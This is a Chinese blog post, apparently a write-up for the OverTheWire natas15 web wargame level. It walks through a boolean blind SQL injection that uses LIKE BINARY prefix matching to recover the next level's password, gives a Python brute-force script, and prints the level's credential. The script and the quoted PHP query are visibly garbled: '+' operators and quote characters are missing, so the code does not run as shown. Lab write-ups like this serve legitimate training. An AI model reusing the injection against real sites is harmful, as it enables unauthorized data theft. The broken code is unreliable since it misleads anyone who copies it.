natas一系列是国外的web安全游戏,可以真正的帮你练习web渗透,不单单是依靠工具,这次要写的就是一个sql盲注的脚本,下边附上第一关的网址
http://overthewire.org/wargames/natas/natas0.html
前几关还都好过,到了后边越来越难,写题解的大多都是外国,国内能的搜到只有很少,而且看了国内某巨巨用linux写的各种题解,云里雾里,只好跑到国外看,看了五六篇之后豁然开朗
进入第15关看到的只有一个输入框和一个按钮
查看源码
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas15", "pass": "<censored>" };</script></head>
<body>
<h1>natas15</h1>
<div id="content">
<?
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas15', '<censored>');
mysql_select_db('natas15', $link);
$query = "SELECT * from users where username="".$_REQUEST["username"].""";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysql_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
这一块
$query = "SELECT * from users where username="".$_REQUEST["username"].""";
我们可以看到一个sql语句,很明显的可以注入,但是我们的目标是拿到下一关的密码,仔细分析一下就知道是sql盲注,他这里在输入用户名后,会返回一个用户是否存在的信息,我们想要的是natas16,输入测试发现用户的确存在,首先能想到的是爆破,但是每一关的密码长度太长,尝试需要的时间是恐怖的,然后就是sql模糊查询,假设我们输入的sql语句是这样
SELECT * from users where username=
natas16 and password like binary "W%"
(顺便提一下sql语句,like是模糊查询,binary是区分大小写,%是万用字元,W%是指数据库password列找到以W开头的数据,and 是在满足前一个用户名的条件下匹配后一个)
如果这里的W是密码开头的字符,就会返回user exists 如果不是会返回user doesn't exist
我们就可以知道这个字符是不是密码的第一个字符,接着这个字符然后输入第二个
(密码都是由0-9,a-z,A-Z组成,跑过每一个字符即可)
SELECT * from users where username=
natas16 and password like binary "Wa%"
就可以得到第二个是不是(为了方便测试这里用的就是密码,返回的是user exists)
所以我们用一段python来实现,需要注意的是python需要先去实现一个HTTPauth验证,使用requests库来操作(首先需要在github上下载requests,下载解压后windows平台用cd 切换到setup.py的文件目录,执行python setup.py install 即可安装)
这里用到的核心是requests.post()函数,执行验证后同时发送data,下面是我写的python脚本
import requests url = "http://natas15.natas.labs.overthewire.org/index.php" username = "natas15" password= 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' au = requests.auth.HTTPBasicAuth(username,password) ans="" testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" i=0 while i < len(testCharacter): payload = "natas16" AND password like binary"" ans testCharacter[i] "%" #我们伪造的sql语句 req = requests.post(url,auth=au,data={"username":payload}) #用字典来存储sql盲注需要提交的内容 if "This user exists" in req.text: ans =testCharacter[i] print(ans) i=0 continue i =1